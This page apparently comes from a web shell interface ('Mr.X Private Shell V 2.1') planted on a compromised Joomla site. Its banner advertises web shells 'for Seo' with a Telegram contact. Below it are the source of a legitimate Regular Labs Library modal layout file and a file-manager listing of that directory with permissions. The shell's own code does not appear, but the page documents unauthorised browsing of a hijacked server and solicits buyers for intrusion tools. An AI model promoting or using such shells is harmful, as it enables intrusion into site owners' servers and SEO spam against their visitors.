__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * @package Regular Labs Library * @version 25.6.10828 * * @author Peter van Westen <[email protected]> * @link https://regularlabs.com * @copyright Copyright © 2025 Regular Labs All Rights Reserved * @license GNU General Public License version 2 or later */ use Joomla\CMS\HTML\HTMLHelper as JHtml; use Joomla\CMS\Language\Text as JText; use Joomla\CMS\Layout\FileLayout as JFileLayout; defined('_JEXEC') or die; /** * @var array $displayData * @var int $id * @var string $extension */ extract($displayData); $body = (new JFileLayout( 'regularlabs.form.field.downloadkey_modal_body', JPATH_SITE . '/libraries/regularlabs/layouts' ))->render([ 'id' => $id, 'extension' => $extension, ]); $onclick = 'RegularLabs.DownloadKey.save(\'' . $extension . '\', document.querySelector(\'#' . $id . '_modal\').value, document.querySelector(\'#downloadKeyModal_' . $id . '\'));'; echo JHtml::_( 'bootstrap.renderModal', 'downloadKeyModal_' . $id, [ 'title' => JText::_('RL_REGULAR_LABS_DOWNLOAD_KEY'), 'modalWidth' => '60', 'footer' => '<button type="button" class="btn btn-success" onclick="' . $onclick . '">' . JText::_('JAPPLY') . '</button>' . '<button type="button" class="btn btn-secondary" data-bs-dismiss="modal" aria-hidden="true">' . JText::_('JLIB_HTML_BEHAVIOR_CLOSE') . '</button>', ], $body );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| subform | Folder | 0775 |
|
|
| checkboxes.php | File | 4.42 KB | 0664 |
|
| customoptions.php | File | 3.3 KB | 0664 |
|
| downloadkey.php | File | 3.2 KB | 0664 |
|
| downloadkey_errors.php | File | 1.68 KB | 0664 |
|
| downloadkey_modal.php | File | 1.49 KB | 0664 |
|
| downloadkey_modal_body.php | File | 1.12 KB | 0664 |
|
| icontoggle.php | File | 2.07 KB | 0664 |
|
| range.php | File | 5.33 KB | 0664 |
|
| simplecategory.php | File | 3.57 KB | 0664 |
|
| textarea.php | File | 4.86 KB | 0664 |
|
| treeselect.php | File | 7.19 KB | 0664 |
|